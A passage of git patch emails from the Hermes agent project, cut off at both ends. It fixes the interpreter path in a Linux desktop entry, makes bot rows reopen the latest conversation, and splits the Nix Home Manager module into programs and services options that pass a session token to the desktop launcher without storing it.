python3``, + # a system path) would escape the venv when spawned by the DE. + exe_dir = str(Path(sys.executable).resolve().parent) + return exe_dir not in shebang + + def _quote_exec_arg(arg: str) -> str: """Quote one ``Exec`` argument per the desktop entry spec. diff --git a/tests/hermes_cli/test_linux_desktop_entry.py b/tests/hermes_cli/test_linux_desktop_entry.py index 37087e36b3..5bc73fb5b2 100644 --- a/tests/hermes_cli/test_linux_desktop_entry.py +++ b/tests/hermes_cli/test_linux_desktop_entry.py @@ -88,6 +88,67 @@ def test_exec_falls_back_to_interpreter_module(tmp_path, xdg_home, monkeypatch): assert Path(exec_line.split(" ")[0]).is_absolute() +# #90292: the shell installer's bash wrapper makes argv[0] the repo `hermes` +# python script whose `#!/usr/bin/env python3` shebang resolves to the SYSTEM +# interpreter when the DE spawns the .desktop entry → ModuleNotFoundError, +# silent (Terminal=false). The Exec line must prefix sys.executable for any +# resolved bin that is a python script escaping the running venv. +def test_exec_prefixes_interpreter_for_env_shebang_python_script(tmp_path, xdg_home, monkeypatch): + import sys + + root = _make_project(tmp_path) + hermes_bin = tmp_path / "bin" / "hermes" + hermes_bin.parent.mkdir() + hermes_bin.write_text("#!/usr/bin/env python3\nimport hermes_cli\n", encoding="utf-8") + hermes_bin.chmod(0o755) + monkeypatch.setattr("hermes_cli.relaunch.resolve_hermes_bin", lambda: str(hermes_bin)) + monkeypatch.setattr(lde, "refresh_desktop_databases", lambda _dir: []) + + entry = lde.install_desktop_entry(root) + exec_line = _parse(entry.read_text(encoding="utf-8"))["Exec"] + + interpreter = str(Path(sys.executable).resolve()) + assert exec_line.split(" ")[0].strip('"') == interpreter + assert str(hermes_bin) in exec_line + assert exec_line.endswith("desktop") + + +def test_exec_leaves_shell_wrapper_launchers_alone(tmp_path, xdg_home, monkeypatch): + root = _make_project(tmp_path) + hermes_bin = tmp_path / "bin" / "hermes" + hermes_bin.parent.mkdir() + hermes_bin.write_text('#!/bin/bash\nexec /opt/hermes/venv/bin/python "$@"\n', encoding="utf-8") + hermes_bin.chmod(0o755) + monkeypatch.setattr("hermes_cli.relaunch.resolve_hermes_bin", lambda: str(hermes_bin)) + monkeypatch.setattr(lde, "refresh_desktop_databases", lambda _dir: []) + + entry = lde.install_desktop_entry(root) + exec_line = _parse(entry.read_text(encoding="utf-8"))["Exec"] + + # A bash wrapper execs the venv python itself — no interpreter prefix. + assert exec_line == f"{hermes_bin} desktop" + + +def test_exec_leaves_venv_shebang_scripts_alone(tmp_path, xdg_home, monkeypatch): + import sys + + root = _make_project(tmp_path) + hermes_bin = tmp_path / "bin" / "hermes" + hermes_bin.parent.mkdir() + interpreter = str(Path(sys.executable).resolve()) + hermes_bin.write_text(f"#!{interpreter}\nimport hermes_cli\n", encoding="utf-8") + hermes_bin.chmod(0o755) + monkeypatch.setattr("hermes_cli.relaunch.resolve_hermes_bin", lambda: str(hermes_bin)) + monkeypatch.setattr(lde, "refresh_desktop_databases", lambda _dir: []) + + entry = lde.install_desktop_entry(root) + exec_line = _parse(entry.read_text(encoding="utf-8"))["Exec"] + + # Console-script with the venv's own interpreter in the shebang: correct + # as-is, prefixing would only add noise. + assert exec_line == f"{hermes_bin} desktop" + + def test_install_is_idempotent_and_skips_cache_refresh(tmp_path, xdg_home, monkeypatch): root = _make_project(tmp_path) monkeypatch.setattr("hermes_cli.relaunch.resolve_hermes_bin", lambda: "/usr/bin/hermes") From 0287dfb0c2874c8716d27cf6a654a42b716be5e0 Mon Sep 17 00:00:00 2001 From: Minsang Lee Date: Fri, 21 Aug 2026 11:26:02 +0900 Subject: [PATCH 040/161] fix(bot-mode): a bot row opens the conversation you were last having MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Clicking a bot in the roster always reopened its pinned canonical Bot Chat. Start a new conversation with bot A, click bot B, click back to A — the new conversation was gone, replaced by the pinned transcript. A bot row is a workspace entry point, so it has to land on the live conversation. Two independent causes, both fixed here: 1. The pin overrode newer work. `openBotCanonicalChat` opened the pin unconditionally. It now prefers the bot's freshest VISIBLE session — but only AFTER `profiles.list` has verified through `preferred_session` that the pin is alive and is a real canonical Bot Chat. That ordering matters: with a dead or unverified pin, adopting the profile's latest row would claim an unrelated user conversation as the bot's chat, and the hide sweep would then hide it. The existing "no pin" / "dead pin" safety tests cover exactly that and still pass. The pin keeps owning plumbing (creation, hide sweep, DM delivery); it just stops shadowing newer conversations. Guards on the candidate (`newerVisibleBotChat`): the canonical chat can never shadow itself, an empty draft never displaces a real conversation, and a gateway that omits `message_count` is treated as real history rather than discarded. 2. The workspace did not follow the bot. The three `host.openSession` calls on the bot path relied on the SDK default `keepAllProfilesScope: true`, so `$activeGatewayProfile` stayed on whatever profile was active before the click. Sessions created afterwards were then filed under the previous bot's profile — measured: four new chats started from three different bots all persisted into one profile's state.db. Clicking a bot IS a profile switch, so these pass `false`. Note on the call shape: `previewSession` is `bot.preferred_session || last`, so on a pinned bot it resolves to the PIN (preview identity must match click identity). Feeding that as the "newer" candidate makes the whole preference dead code — it always sees the pin and short-circuits on "same id". The freshest visible session therefore arrives as its own argument. The first attempt at this fix had that bug and passed its tests, which is why `bot-row-opens-latest.test.mjs` mirrors the production call site argument for argument rather than constructing a convenient one. Tests: 362 pass (was 348). Each new guard was verified by sabotage — reverting any one of the three behaviours above makes the suite fail (1, 3, and 1 tests respectively), so none of them is a test that passes either way. --- .../desktop/src/plugins/hermes-bots/plugin.js | 87 ++++++- .../tests/bot-row-opens-latest.test.mjs | 227 ++++++++++++++++++ .../tests/canonical-chat-identity.test.mjs | 7 +- 3 files changed, 315 insertions(+), 6 deletions(-) create mode 100644 apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-latest.test.mjs diff --git a/apps/desktop/src/plugins/hermes-bots/plugin.js b/apps/desktop/src/plugins/hermes-bots/plugin.js index 3fe2c4eb7e..c5f783ddb3 100644 --- a/apps/desktop/src/plugins/hermes-bots/plugin.js +++ b/apps/desktop/src/plugins/hermes-bots/plugin.js @@ -4286,7 +4286,16 @@ async function openStoredBotChat(name, storedId, summary) { intent: 'main', awaitHydration: true, expectHistory, - keepAllProfilesScope: true, + // Move the WORKSPACE onto this bot, not just the transcript. + // + // With the default (true) the bot's chat opened against its own backend + // while `$activeGatewayProfile` stayed on whatever profile was active + // before — so "New session" from inside any bot was created on that other + // backend. Measured: four consecutive new chats started from different + // bots all landed in the `ops` profile's state.db. Clicking a bot is a + // workspace switch in this product (one bot = one workspace), so the + // chrome has to follow. + keepAllProfilesScope: false, retryHydrationTimeoutOnce: true }) @@ -4374,7 +4383,7 @@ function createCanonicalChat(name) { if (sid && typeof host.openSession === 'function') { try { - await host.openSession(sid, { profile: name, intent: 'main', keepAllProfilesScope: true }) + await host.openSession(sid, { profile: name, intent: 'main', keepAllProfilesScope: false }) opened = true } catch { // The stored row may not exist until the kickoff persists it. Retry @@ -4389,7 +4398,7 @@ function createCanonicalChat(name) { await host.request('prompt.submit', { session_id: runtime, text: 'Hey, tell me about yourself!' }) if (!opened && sid && typeof host.openSession === 'function') { - await host.openSession(sid, { profile: name, intent: 'main', keepAllProfilesScope: true }) + await host.openSession(sid, { profile: name, intent: 'main', keepAllProfilesScope: false }) } } catch { // The chat already exists. Keep the pin so the next click @@ -4425,7 +4434,37 @@ function isCanonicalBotChatHistory(history) { return rootTitle === 'Bot Chat' || (!rootTitle && title === 'Bot Chat') } -async function openBotCanonicalChat(name, pinned, history) { +/** The bot's newest VISIBLE conversation when it should win over the pin, else + * null. + * + * A bot row is a workspace entry point, so it must land on what the user was + * last saying to that bot — not on a pin frozen weeks ago. Guards, all of + * which matter: + * - the canonical Bot Chat itself is never "newer" (it IS the pin), so + * plumbing can't shadow itself; + * - an empty draft is skipped: clicking a bot right after a stray ⌘N would + * otherwise open a blank chat instead of the conversation; + * - identical ids mean the pin already points there — nothing to switch to. + * Returns the stored id so callers keep using the normal open path. */ +function newerVisibleBotChat(pinned, history) { + const id = history?.id + + if (!id || id === pinned || isCanonicalBotChatHistory(history)) { + return null + } + + // `message_count` is absent on older gateways — treat unknown as real + // history rather than discarding a legitimate conversation. + const count = history?.message_count + + if (typeof count === 'number' && count <= 0) { + return null + } + + return id +} + +async function openBotCanonicalChat(name, pinned, history, latestVisible) { if (!pinned) { // Grandfather only an actual Bot Chat. `last_session` is merely the most // recent row for the profile; adopting it blindly can claim an unrelated @@ -4467,6 +4506,38 @@ async function openBotCanonicalChat(name, pinned, history) { } if (preferred && isCanonicalBotChatHistory(preferred)) { + // The pin is alive and healthy — but it is not necessarily where the user + // left off. Prefer their MOST RECENT real conversation with this bot. + // + // "One bot = one forever chat" welded each row to a single session: start + // a new chat with a bot, click another bot, click back, and the new chat + // was stranded behind the pinned transcript ("세션을 다시 만들어도 다른 봇 + // 갔다가 다시 누르면 그 전 세션으로 돌아와"). A bot row is a workspace + // entry point here, so it should land on the live conversation. The pin + // keeps owning plumbing — creation, hide sweep, DM delivery — and stays + // untouched; it just stops overriding newer work. + // + // Deliberately AFTER the verification above: with a dead or unverified + // pin, adopting the profile's latest row would claim an unrelated user + // conversation as the bot's chat (see the "dead pin" safety tests). + // + // Uses `latestVisible` (the roster's freshest visible session), NOT + // `history` — the caller's `history` prefers the pin so preview identity + // matches click identity, which means it can never BE the newer chat. + // Falls back to `history` for callers that pass only three arguments. + const newer = newerVisibleBotChat(pinned, latestVisible ?? history) + + if (newer) { + try { + await openStoredBotChat(name, newer, history) + + return newer + } catch { + // Deleted or unreachable — fall back to the verified pin below so the + // row is never dead. + } + } + try { await openStoredBotChat(name, preferred.resolved_id || preferred.id, preferred) return pinned @@ -6359,7 +6430,13 @@ function BotRow({ bot, onDelete, onEdit, onGroup }) { } try { - const id = await openBotCanonicalChat(bot.name, pinnedChat, previewSession) + // `previewSession` prefers the PIN (preview identity must match click + // identity), so it can never carry the newer conversation. Pass the + // roster's freshest VISIBLE session (`last`) separately — that is what + // "open where I left off" needs. Without this the newer-chat preference + // was dead code: it always received the pin and short-circuited on + // "same id". + const id = await openBotCanonicalChat(bot.name, pinnedChat, previewSession, last) if (generation === botOpenGeneration && id) { return diff --git a/apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-latest.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-latest.test.mjs new file mode 100644 index 0000000000..84e03fe5f1 --- /dev/null +++ b/apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-latest.test.mjs @@ -0,0 +1,227 @@ +import assert from 'node:assert/strict' +import { readFileSync } from 'node:fs' +import test from 'node:test' +import vm from 'node:vm' + +const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') + +/** + * A bot row must open the conversation the user was LAST having with that bot. + * + * Symptom (2026-08-21): every bot was welded to one session. Start a new chat + * with 기획총괄, click 시스템총괄, click back — and the new chat was gone, + * replaced by the pinned transcript. "세션을 다시 만들어도 다른 봇 갔다가 다시 + * 누르면 그 전 세션으로 다시 돌아와." + * + * The pin still owns plumbing (creation, hide sweep, DM delivery); it just + * must not override a newer real conversation. + */ +function loadOpenPath({ openSession, request }) { + const start = source.indexOf('const canonicalCreations = new Map()') + const end = source.indexOf('function displayName(', start) + + assert.notEqual(start, -1, 'canonical creation section is missing') + assert.notEqual(end, -1, 'canonical creation section delimiter is missing') + + const saved = [] + const opened = [] + const context = { + host: { + openSession: async (id, options) => { + opened.push({ id, options }) + + return openSession(id, options) + }, + request: async (method, params) => request(method, params) + }, + saveBotMeta: (name, patch) => saved.push({ name, patch: JSON.parse(JSON.stringify(patch)) }), + $hideBotChats: { get: () => false }, + window: { setTimeout: callback => callback() } + } + + const section = source + .slice(start, end) + .concat('\nglobalThis.__open = { openBotCanonicalChat, newerVisibleBotChat };\n') + + vm.runInNewContext(section, context, { filename: 'canonical-open.js' }) + + return { ...context.__open, saved, opened } +} + +const noRequests = async () => ({}) + +/** A live, healthy pin: `profiles.list` resolves it to the canonical Bot Chat. + * That verification is the gate the newer-conversation preference sits behind + * — with a dead or unverified pin the bot must NOT adopt the profile's latest + * row (that would claim an unrelated conversation). */ +const healthyPin = + (pinned = 'pinned-bot-chat') => + async (method, params) => { + if (method === 'profiles.list') { + const name = Object.keys(params?.preferred_session_ids ?? { ops: 1 })[0] + + return { + profiles: [{ name, preferred_session: { id: pinned, resolved_id: pinned, title: 'Bot Chat' } }] + } + } + + return {} + } + +test('bot row opens the NEWER real conversation instead of the pinned chat', async () => { + const runtime = loadOpenPath({ openSession: async () => undefined, request: healthyPin() }) + + // The roster's freshest visible session is a real conversation the user + // started after the pin was made. + const history = { id: 'new-chat', title: '릴시아 카피 회의', message_count: 12, last_active: 9000 } + + const result = await runtime.openBotCanonicalChat('plan', 'pinned-bot-chat', history, history) + + assert.equal(result, 'new-chat', 'should return the newer conversation') + assert.equal(runtime.opened.length, 1) + assert.equal(runtime.opened[0].id, 'new-chat', 'must not reopen the pinned transcript') + assert.equal(runtime.opened[0].options.profile, 'plan') + assert.equal( + runtime.opened[0].options.keepAllProfilesScope, + false, + 'clicking a bot moves the workspace onto that bot' + ) +}) + +/** + * The REAL call shape from the roster row — this is what the first fix got + * wrong. `previewSession` is `bot.preferred_session || last`, so on a pinned + * bot it resolves to the PIN (preview identity must match click identity). + * Feeding that as the "newer" candidate made the whole preference dead code: + * it always saw the pin and short-circuited on "same id", and the user still + * got the old session back ("다른 봇 눌렀다가 다시 그 봇 누르면 그 전 세션 열림"). + * The freshest visible session has to arrive as its own argument. + */ +test('real roster call: previewSession is the pin, latest arrives separately', async () => { + const runtime = loadOpenPath({ openSession: async () => undefined, request: healthyPin('pin-1') }) + + const pinnedPreview = { id: 'pin-1', title: 'Bot Chat', preview: 'plumbing' } + const last = { id: 'user-newest', title: '오늘 기획 회의', message_count: 8, last_active: 9999 } + + // Mirrors: openBotCanonicalChat(bot.name, pinnedChat, previewSession, last) + const result = await runtime.openBotCanonicalChat('plan', 'pin-1', pinnedPreview, last) + + assert.equal(result, 'user-newest', 'must open the newest real conversation, not the pin') + assert.equal(runtime.opened[0].id, 'user-newest') +}) + +test('the canonical Bot Chat itself never counts as "newer" (it IS the pin)', () => { + const runtime = loadOpenPath({ openSession: async () => undefined, request: noRequests }) + + assert.equal(runtime.newerVisibleBotChat('pin-1', { id: 'hidden-plumbing', title: 'Bot Chat' }), null) + assert.equal( + runtime.newerVisibleBotChat('pin-1', { id: 'hidden-plumbing', root_title: 'Bot Chat', title: '자동 제목' }), + null + ) +}) + +test('an empty draft never displaces the pinned conversation', () => { + const runtime = loadOpenPath({ openSession: async () => undefined, request: noRequests }) + + assert.equal(runtime.newerVisibleBotChat('pin-1', { id: 'blank', title: '', message_count: 0 }), null) +}) + +test('a gateway that omits message_count still yields the newer session', () => { + const runtime = loadOpenPath({ openSession: async () => undefined, request: noRequests }) + + assert.equal(runtime.newerVisibleBotChat('pin-1', { id: 'legacy', title: '대화' }), 'legacy') +}) + +test('history that IS the pin changes nothing', () => { + const runtime = loadOpenPath({ openSession: async () => undefined, request: noRequests }) + + assert.equal(runtime.newerVisibleBotChat('same-id', { id: 'same-id', title: '대화', message_count: 5 }), null) +}) + +/** + * Every path that mounts a bot's chat must move the workspace onto that bot. + * + * `keepAllProfilesScope` defaults to TRUE in the SDK, which keeps + * `$activeGatewayProfile` pointing at whatever profile was active before the + * click. Bot Mode wants the opposite: clicking a bot IS a profile switch, and + * leaving the scope behind meant sessions created afterwards were filed under + * the previous bot's profile (measured: four new chats started from three + * different bots all landed in `ops`). + * + * The newly-minted-chat path is asserted separately from the stored-chat path + * because they are different call sites; a guard on only one of them let the + * other regress silently. + */ +function creationRuntime({ failFirstOpen = false } = {}) { + let opens = 0 + + return loadOpenPath({ + openSession: async () => { + opens += 1 + + if (failFirstOpen && opens === 1) { + throw new Error('stored row not persisted yet') + } + + return undefined + }, + request: async method => { + if (method === 'session.create') { + return { stored_session_id: 'fresh-stored', session_id: 'fresh-runtime' } + } + + return {} + } + }) +} + +test('a newly minted Bot Chat opens with the workspace following the bot', async () => { + const runtime = creationRuntime() + + // No pin and no adoptable history — the real "first click on a bot" path. + const result = await runtime.openBotCanonicalChat('plan', null, null, null) + + assert.equal(result, 'fresh-stored') + assert.ok(runtime.opened.length >= 1, 'the new chat is mounted') + + for (const entry of runtime.opened) { + assert.equal(entry.options.keepAllProfilesScope, false, 'creating a bot chat must move the workspace onto that bot') + assert.equal(entry.options.profile, 'plan') + } +}) + +test('the post-kickoff retry open also follows the bot', async () => { + const runtime = creationRuntime({ failFirstOpen: true }) + + await runtime.openBotCanonicalChat('plan', null, null, null) + + assert.equal(runtime.opened.length, 2, 'first open fails, retry runs after the kickoff') + assert.equal( + runtime.opened[1].options.keepAllProfilesScope, + false, + 'the retry must not silently fall back to the SDK default' + ) +}) + +test('a failed open of the newer session falls back to the pin (row never dies)', async () => { + const runtime = loadOpenPath({ + openSession: async id => { + if (id === 'deleted-chat') { + throw new Error('session not found') + } + + return undefined + }, + request: healthyPin('pin-1') + }) + + const history = { id: 'deleted-chat', title: '지워진 대화', message_count: 3 } + + const result = await runtime.openBotCanonicalChat('ops', 'pin-1', history) + + const ids = runtime.opened.map(entry => entry.id) + + assert.ok(ids.includes('deleted-chat'), 'tries the newer session first') + assert.ok(ids.includes('pin-1'), 'falls back to the verified pin') + assert.equal(result, 'pin-1', 'row resolves to the pin rather than failing') +}) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-identity.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-identity.test.mjs index c09b7dafc2..54a9056f4d 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-identity.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-identity.test.mjs @@ -129,7 +129,12 @@ test('pin: preferred_session present opens the resolved session and keeps the pi intent: 'main', awaitHydration: true, expectHistory: true, - keepAllProfilesScope: true, + // false: clicking a bot moves the WORKSPACE onto that bot, not just the + // transcript. With true, `$activeGatewayProfile` stayed on the previously + // active profile, so "New session" from inside any bot was created on + // that other backend (measured: four new chats from different bots all + // landed in `ops`). + keepAllProfilesScope: false, retryHydrationTimeoutOnce: true } }]) From 76f6ba37064614a703ce2d19ade6bb5fbbf4fcf8 Mon Sep 17 00:00:00 2001 From: ethernet Date: Fri, 21 Aug 2026 16:19:17 -0400 Subject: [PATCH 041/161] feat(nix): give Home Manager a programs module and the desktop app Home Manager separates an installation from a daemon. This module put both under `services.hermes-agent`, and `installPackage` added a program to the PATH from a service module. `programs.hermes-agent` now installs the command line application and the desktop application. `services.hermes-agent` keeps the state, the configuration and the daemons, and stays the authority: the new module reads `hermesHome` and the backend address from it. A person can enable one without the other, which is a machine with an application and no gateway, or a headless gateway with no display. The desktop application needs this split to work correctly. A launcher that starts from the desktop menu reads no shell profile, thus the HERMES_HOME that `home.sessionVariables` exports reaches an interactive shell only. Home Manager writes `systemd.user.sessionVariables` to environment.d, and this module puts no HERMES_HOME there, because that file applies to each user unit. The application then opens ~/.hermes while the services use `hermesHome`, and the person sees no sessions and no keys. Thus the launcher carries the value itself, through a new `extraEnv` argument on the desktop package. The application also gets the Nix agent package, with HERMES_DESKTOP_HERMES. The usual distribution of the Electron application carries its own Hermes runtime and downloads more at the first start. `hermesDesktop` is a passthru of the agent and pins `finalAttrs.finalPackage`, so an override of `extraPythonPackages` or `extraDependencyGroups` reaches both. One machine thus has one runtime. `backend.sessionTokenFile` connects the application to the backend of the service. Without it the module runs `hermes serve` and the application starts a backend of its own, which gives two backends on one HERMES_HOME. The backend reads the file into HERMES_DASHBOARD_SESSION_TOKEN. The launcher reads the same file into HERMES_DESKTOP_REMOTE_TOKEN, beside a HERMES_DESKTOP_REMOTE_URL that names the address of the service. Measurements against a live `hermes serve` on loopback show why that shape is the correct one: - `_resolve_session_token()` reads HERMES_DASHBOARD_SESSION_TOKEN, and `_has_valid_session_token` accepts that value as a Bearer credential. A request without it gets 401, and a request with the wrong value gets 401. - The /api/ws socket accepts a query parameter only. A header gets 403, and `?token=` connects. Hermes Desktop builds exactly that URL, in `apps/desktop/electron/connection-config.ts`. Thus a test of the HTTP leg alone is a false positive. - `resolveDesktopRemoteRoute` throws when the URL is set and the token is not. Thus the two variables travel together or not at all. The token enters no Nix store path. `makeWrapper --set` and a systemd `Environment=` value both write a literal into the store, which all users can read. Thus each side reads the file at start time. The launcher does it through a new `extraRun` argument on the desktop package, and the backend through the launcher script that `backend.waitFor` already uses. launchd has no EnvironmentFile, so a script is the one shape that works on Linux and on Darwin. `backendArgv` gives the plain argv only when nothing must run before the backend. `services.hermes-agent.installPackage` is removed. It defaulted to true, so a person who never named it still got the command line. A silent removal thus gives them a machine with no `hermes` and no message. The module refuses a configuration that sets it, and the text names the exact replacement for the value they gave. Checks: - the launcher carries HERMES_HOME - the launcher reports HERMES_MANAGED only when the services own the configuration, because no activation writes a marker without them - the launcher pins the agent package that `programs.enable` installs - the launcher names the backend of the service, and gives a token beside the URL - the backend reads the session token - each side reads the file at start time, and the token is no `--set` value - `programs.enable` alone starts no service - `installPackage` is refused, with a message that names the replacement, and its absence evaluates Each check reads the wrapper of the real package, and not an option value. Each one was tested with a mutation that breaks the behavior it asserts. --- nix/checks.nix | 308 +++++++++++++++++- nix/desktop.nix | 23 +- nix/homeManagerModules.nix | 365 +++++++++++++++------- nix/moduleCommon.nix | 94 +++++- website/docs/getting-started/nix-setup.md | 46 ++- 5 files changed, 708 insertions(+), 128 deletions(-) diff --git a/nix/checks.nix b/nix/checks.nix index f353b6942b..227f57d5e5 100644 --- a/nix/checks.nix +++ b/nix/checks.nix @@ -54,6 +54,31 @@ ]; }; + # The programs./services. split means a check often needs both halves. + # This takes each one as its own attribute set. + evalHomeSplit = + { + programs ? { }, + services ? { }, + }: + inputs.home-manager.lib.homeManagerConfiguration { + inherit pkgs; + modules = [ + inputs.self.homeManagerModules.default + { + home = { + username = "hermes-check"; + homeDirectory = "/home/hermes-check"; + stateVersion = "24.11"; + }; + } + { + programs.hermes-agent = programs; + services.hermes-agent = services; + } + ]; + }; + # The option names that each module defines under # services.hermes-agent. The internal names that the module system adds # are not in the list. @@ -149,21 +174,24 @@ json.dump(sorted(leaf_paths(DEFAULT_CONFIG)), sys.stdout, indent=2) # agents. Each host checks its own kind of process. home-manager-module = let - enabled = evalHomeModule { - enable = true; - gateway.enable = true; - backend.mode = "serve"; - settings.model.default = "test/model"; - environment.HERMES_TEST = "1"; - environmentFiles = [ "/run/secrets/hermes-env" ]; - hermesHomeFiles."SOUL.md" = "test soul"; - # documents needs an explicit workingDirectory. The check - # workspace-files-need-a-directory below asserts that rule. - workingDirectory = "/home/test-user/workspace"; - documents."AGENTS.md" = "test agents"; - mcpServers.demo = { - command = "echo"; - args = [ "hi" ]; + enabled = evalHomeSplit { + programs.enable = true; + services = { + enable = true; + gateway.enable = true; + backend.mode = "serve"; + settings.model.default = "test/model"; + environment.HERMES_TEST = "1"; + environmentFiles = [ "/run/secrets/hermes-env" ]; + hermesHomeFiles."SOUL.md" = "test soul"; + # documents needs an explicit workingDirectory. The check + # workspace-files-need-a-directory below asserts that rule. + workingDirectory = "/home/test-user/workspace"; + documents."AGENTS.md" = "test agents"; + mcpServers.demo = { + command = "echo"; + args = [ "hi" ]; + }; }; }; cfg = enabled.config; @@ -217,7 +245,7 @@ json.dump(sorted(leaf_paths(DEFAULT_CONFIG)), sys.stdout, indent=2) ) "gateway and backend must share one HERMES_HOME" ++ lib.optional ( cfg.home.sessionVariables.HERMES_HOME or null != "/home/hermes-check/.hermes" - ) "installPackage must export HERMES_HOME for interactive shells" + ) "programs.hermes-agent.enable must export HERMES_HOME for interactive shells" ++ lib.optional ( !lib.hasInfix "hermes-config-merge" activation ) "activation must deep-merge config.yaml, not overwrite it" @@ -325,6 +353,250 @@ json.dump(sorted(leaf_paths(DEFAULT_CONFIG)), sys.stdout, indent=2) '' ); + # ── The desktop application shares one HERMES_HOME ─────────────── + # `programs.enable` exports HERMES_HOME with home.sessionVariables, + # which reaches an interactive shell only. Home Manager writes that + # file to etc/profile.d, and a launcher from the desktop menu reads + # no shell profile. Thus the desktop application would open ~/.hermes + # while the services use the HERMES_HOME of the module, and the user + # would see an empty application with no sessions and no keys. + # + # The launcher must therefore carry the value itself. This check + # reads the real wrapper text of the package that the module + # installs, and not an option value. + home-manager-desktop = + let + tokenFile = "/run/secrets/hermes-desktop-token"; + + enabled = evalHomeSplit { + programs = { + enable = true; + desktop.enable = true; + }; + services = { + enable = true; + hermesHome = "/home/hermes-check/.hermes-work"; + # An override on purpose. Without one the effective package + # IS the default package, so a launcher that pinned the plain + # default would look correct while it shipped a second + # runtime to anyone who customises theirs. + extraDependencyGroups = [ "hindsight" ]; + backend = { + mode = "serve"; + port = 9231; + sessionTokenFile = tokenFile; + }; + }; + }; + cfg = enabled.config; + + desktopPackages = builtins.filter (p: (p.pname or "") == "hermes-desktop") cfg.home.packages; + desktop = lib.head desktopPackages; + wrapper = desktop.installPhase; + + # Read the value that each --set flag gives the launcher. The + # quotes are not part of the test: escapeShellArg adds them only + # when the value needs them, and a path with no special character + # arrives bare. + setValue = + name: + let + m = builtins.match ".*--set ${name} ['\"]?([^'\"\n ]*)['\"]?.*" wrapper; + in + if m == null then null else lib.head m; + + # The agent package that the module installs, and the runtime + # that the launcher pins. These must be the same store path: a + # second Hermes runtime beside the services is the fault that + # `programs.enable` plus a plain desktop package would give. + agentPackages = builtins.filter (p: (p.pname or "") == "hermes-agent") cfg.home.packages; + + # The backend of the service, as the unit or the agent runs it. + backendScript = + let + argv = + if pkgs.stdenv.hostPlatform.isDarwin then + cfg.launchd.agents.hermes-backend.config.ProgramArguments + else + [ cfg.systemd.user.services.hermes-backend.Service.ExecStart ]; + first = lib.head (lib.flatten argv); + # writeShellScript gives a store path. Read the real text, so + # the check tests the script and not the option that made it. + path = lib.head (lib.splitString " " first); + in + builtins.readFile path; + + failures = + lib.optional ( + lib.length desktopPackages != 1 + ) "programs.desktop.enable must install exactly one hermes-desktop package, got ${toString (lib.length desktopPackages)}" + ++ lib.optional ( + setValue "HERMES_HOME" != "/home/hermes-check/.hermes-work" + ) "the launcher must carry HERMES_HOME: a GUI launcher reads no shell profile, so home.sessionVariables never reaches it (got: ${toString (setValue "HERMES_HOME")})" + ++ lib.optional ( + setValue "HERMES_MANAGED" != "home-manager" + ) "the launcher must report HERMES_MANAGED=home-manager while the services own the configuration (got: ${toString (setValue "HERMES_MANAGED")})" + ++ lib.optional ( + lib.length agentPackages == 1 + && setValue "HERMES_DESKTOP_HERMES" != "${lib.head agentPackages}/bin/hermes" + ) "the launcher must pin the agent package that programs.enable installs, and not a second runtime: ${toString (setValue "HERMES_DESKTOP_HERMES")}" + + # ── The application reaches the backend of the service ────── + ++ lib.optional ( + setValue "HERMES_DESKTOP_REMOTE_URL" != "http://127.0.0.1:9231" + ) "the launcher must name the backend of the service, or the application starts a second one (got: ${toString (setValue "HERMES_DESKTOP_REMOTE_URL")})" + ++ lib.optional ( + !lib.hasInfix "HERMES_DESKTOP_REMOTE_TOKEN" wrapper + ) "the launcher must give a token with the URL: the desktop resolver throws when the URL is set alone" + ++ lib.optional ( + !lib.hasInfix "HERMES_DASHBOARD_SESSION_TOKEN" backendScript + ) "the backend must read the session token, or it makes a new one that the application cannot know" + + # ── The token never enters the Nix store ──────────────────── + # Each side must read the file at start time. A --set flag or + # an Environment= value writes the literal into a store path + # that all users can read. + ++ lib.optional ( + !lib.hasInfix tokenFile wrapper || !lib.hasInfix "--run" wrapper + ) "the launcher must read the token from ${tokenFile} at start time, with --run" + ++ lib.optional ( + !lib.hasInfix tokenFile backendScript + ) "the backend must read the token from ${tokenFile} at start time" + ++ lib.optional ( + setValue "HERMES_DESKTOP_REMOTE_TOKEN" != null + ) "the token must never be a --set value: makeWrapper writes it into the world-readable Nix store"; + in + pkgs.runCommand "hermes-home-manager-desktop" { } ( + if failures != [ ] then + throw "Home Manager desktop check failed:\n${lib.concatMapStringsSep "\n" (f: " - ${f}") failures}" + else + '' + echo "PASS: the desktop launcher shares HERMES_HOME, the runtime and the backend of the service" + mkdir -p $out + echo "ok" > $out/result + '' + ); + + # ── The desktop application without the services ───────────────── + # A person can want the application on a machine that runs no daemon. + # Then nothing writes config.yaml or the .managed marker, so the + # launcher must not claim a managed install: the CLI would refuse an + # edit that nothing else owns. It must also not name a backend, since + # there is none. + home-manager-desktop-standalone = + let + enabled = evalHomeSplit { + programs = { + enable = true; + desktop.enable = true; + }; + }; + cfg = enabled.config; + + desktopPackages = builtins.filter (p: (p.pname or "") == "hermes-desktop") cfg.home.packages; + wrapper = (lib.head desktopPackages).installPhase; + + failures = + lib.optional ( + lib.length desktopPackages != 1 + ) "programs.desktop.enable must install the application with no services enabled" + ++ lib.optional ( + !lib.hasInfix "--set HERMES_HOME" wrapper + ) "the launcher must carry HERMES_HOME even with no services" + ++ lib.optional ( + lib.hasInfix "HERMES_MANAGED" wrapper + ) "the launcher must not claim a managed install when no activation writes one" + ++ lib.optional ( + lib.hasInfix "HERMES_DESKTOP_REMOTE_URL" wrapper + ) "the launcher must not name a backend when the services run none" + ++ lib.optional ( + cfg.systemd.user.services ? hermes-backend || cfg.launchd.agents ? hermes-backend + ) "programs.enable alone must start no service"; + in + pkgs.runCommand "hermes-home-manager-desktop-standalone" { } ( + if failures != [ ] then + throw "Home Manager standalone desktop check failed:\n${lib.concatMapStringsSep "\n" (f: " - ${f}") failures}" + else + '' + echo "PASS: the application runs with no services, and claims nothing that no activation wrote" + mkdir -p $out + echo "ok" > $out/result + '' + ); + + # ── installPackage names its replacement ───────────────────────── + # The option was removed by the programs./services. split. It + # defaulted to true, so a person who never named it still got the + # command line. A silent removal thus leaves them with no `hermes` + # 